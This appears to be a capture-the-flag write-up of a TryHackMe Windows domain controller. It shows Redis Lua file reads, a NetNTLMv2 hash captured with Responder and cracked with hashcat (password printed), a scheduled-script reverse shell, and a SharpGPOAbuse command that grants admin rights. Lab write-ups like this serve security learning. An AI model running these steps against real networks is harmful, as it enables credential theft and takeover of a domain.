PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-09-08T10:54:11 |_ start_date: N/A 6379/tcp open redis Redis key-value store 2w 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49765/tcp open msrpc Microsoft Windows RPC
So, we’re probably looking at a domain controller judging by the DNS service running. Running crackmapexec gives us the domain name vulnnet.local which we’ll use to further enumerate the box.
SMB allows anonymous login but has no shares to display, but Redis allows unauthenticated logins.
edis-cli -h 10.10.134.34 10.10.134.34:6379> config get dir 1) "dir" 2) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
We can get a username from this but I spend a long time attempting various methods of RCE. Eventually I come across this page which gives information on Lua scripting. Initially I wonder if it can be used for a reverse shell but read that it can be used to read files on the local server. Trying to read some common Windows files gives errors but when looking at system32\etc\hosts it errors at the symbol #, knowing how the file should look this seems like it’s attempting to read and process the file.
edis-cli -h 10.10.100.148 eval "dofile('c:\\\windows\\\system32\\\drivers\\\etc\\\hosts')" 0
(error) ERR Error running script (call to f_6bbf051066d6329b897e50da35b0572543917ab4): @user_script:1: c:\windows\system32\drivers\etc\hosts:2: unexpected symbol near '#'As a further test, and knowing the typical naming format for TryHackMe flags, we attempt to see if we can read the flag…
redis-cli -h 10.10.100.148 eval "dofile('c:\\\users\\\enterprise-security\\\desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_0a5fc213d32a52ab24b6bcf4d79058f7b03a659d): @user_script:1: c:\users\enterprise-security\desktop\user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e' Weirdly it stripped the THM{} but otherwise output the flag.
After attempting lots of ways to get a file, I start an SMB server and see we can connect back to ourselves. This means we can start up Responder and hopefully grab the user’s hash!
We get the NetNTLMv2 hash back from responder, so can run it through hashcat and hopefully get our initial access.
hashcat -m 5600 enterprise-security /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
...
ENTERPRISE-SECURITY::VULNNET:42448cf121962106:8f037d8c53edc33e81727a7637c3e918:010100000000000080cb203791c3d8011a8d2776e2ec1732000000000200080035004e
0039004b0001001e00570049004e002d0054004d004b0057003100340054004f0030005600580004003400570049004e002d0054004d004b0057003100340054004f003000560058002e0
035004e0039004b002e004c004f00430041004c000300140035004e0039004b002e004c004f00430041004c000500140035004e0039004b002e004c004f00430041004c000700080080cb
203791c3d80106000400020000000800300030000000000000000000000000300000ad926486cbafb0b4f9406c7602ca122c017e82565d6576257974f7d3620d50cc0a001000000000000
000000000000000000000000900220063006900660073002f00310030002e00310038002e003100300035002e00360034000000000000000000:sand_0873959498
Session..........: hashcat
Status...........: CrackedUsing our creds now we can start to further enumerate the box.
SMBmap shows us a folder we can access, so connecting to SMB we find one file “PurgeIrrelevantData_1826.ps1”. Downloading it and viewing it appears to just be a script, perhaps run as a scheduled task? Before trying this I test to see if we can get remote access any other way, which we don’t appear to be able to.
cat PurgeIrrelevantData_1826.ps1 rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
Using my new favourite Windows Reverse Shell Generator we can modify the script and put it back on to the SMB share and wait…
Despite seeing our users having SeImpersonatePrivilege iurns out we can’t use PrintSpoofer here (despite me trying…), so it’s no easy wins. First thing I’ll do is run Bloodhound to get an idea of what we can exploit.
We can see that we’ve got write privileges over the GPO SECURITY-POL-VN. After much hunting I discover SharpGPOAbuse. A tool we can use to use to modify the GPO, and within it contains syntax for running the tool on a specific user or computer controlled by the vulnerable GPO, so with it we have:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "PrivEsc" --Author vulnnet\Administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Enterprise-Share> get-aduser -identity enterprise-security -properties * | select MemberOf
MemberOf
--------
{CN=Administrators,CN=Builtin,DC=vulnnet,DC=local}
Now with our new-found privileges we can PSExec into the server and grab the root flag.
This was a really informative box. I spent a significant amount of time getting the initial foothold and a while to figure out how to escalate. Lots of thanks to Google and the smart AD hackers out there!